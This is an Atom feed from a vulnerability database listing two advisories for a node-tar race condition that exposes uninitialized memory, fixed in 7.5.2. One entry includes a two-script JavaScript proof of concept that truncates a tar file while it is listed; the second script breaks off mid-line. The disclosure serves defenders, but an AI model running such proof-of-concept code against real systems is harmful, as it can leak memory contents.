<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T15:36:44.241846+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2025-64118</id>
    <title>CVE-2025-64118 — node-tar vulnerable to race condition leading to uninitialized memory exposure</title>
    <updated>2026-10-08T15:36:44.271766+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> isaacs node-tar</p>
<p>node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2025-64118"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-29xp-372q-xqph</id>
    <title>GHSA-29xp-372q-xqph — node-tar has a race condition leading to uninitialized memory exposure</title>
    <updated>2026-10-08T15:36:44.271830+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: tar</p>
<p>### Summary</p>
<p>Using `.t` (aka `.list`) with `{ sync: true }` to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read.</p>
<p>### Details</p>
<p>See:
* https://github.com/isaacs/node-tar/issues/445
* https://github.com/isaacs/node-tar/pull/446
* Regression happened in https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d</p>
<p>### PoC</p>
<p>A:
```js
import * as tar from 'tar'
import fs from 'node:fs'</p>
<p>fs.writeFileSync('tar.test.tmp', Buffer.alloc(1*1024))</p>
<p>// from readme
const filesAdded = []
tar.c(
  {
    sync: true,
    file: 'tar.test.tmp.tar',
    onWriteEntry(entry) {
      // initially, it's uppercase and 0o644
      console.log('adding', entry.path, entry.stat.mode.toString(8))
      // make all the paths lowercase
      entry.path = entry.path.toLowerCase()
      // make the entry executable
      entry.stat.mode = 0o755
      // in the archive, it's lowercase and 0o755
      filesAdded.push([entry.path, entry.stat.mode.toString(8)])
    },
  },
  ['./tar.test.tmp'],
)</p>
<p>const a = fs.readFileSync('tar.test.tmp.tar')</p>
<p>for (let i = 0; ; i++){
  if (i % 10000 === 0) console.log(i)
  fs.writeFileSync('tar.test.tmp.tar', a)
  fs.truncateSync('tar.test.tmp.tar', 600)
}
```</p>
<p>B (vulnerable):
```js
import * as tar from 'tar'
import * as fs from 'fs'</p>
<p>while (true) {
  fs.readFileSync(import.meta.filename)
  tar.t({
    sync: true,
    file: 'tar.test.tmp.tar',
    onReadEntry: e =&gt; e.on('data', b…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-29xp-372q-xqph"/>
  </entry>
</feed>
